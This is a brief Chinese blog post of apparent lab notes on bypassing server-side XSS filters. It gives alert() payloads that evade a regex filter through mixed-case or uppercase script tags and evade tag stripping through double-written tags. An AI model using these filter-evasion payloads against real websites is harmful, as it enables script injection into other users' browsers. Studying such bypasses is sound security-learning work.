XSS后台代码绕过

xss_01
正则表达式替换

绕过方式:大小写混合或纯大写绕过
paylaod:<scripT>alert(AAA);</Script>或<SCRIPT>alert(123);<SCRIPT>

字符最小化

将获取的message数据中获取的大小写字符全部转换为小写
绕过方式:通过双写绕过
Payload:<sc<script>ript>alert</scrip<script>t>

posted @ 2024-03-03 20:04  LaiBuNiZi  阅读(38)  评论(0)    收藏  举报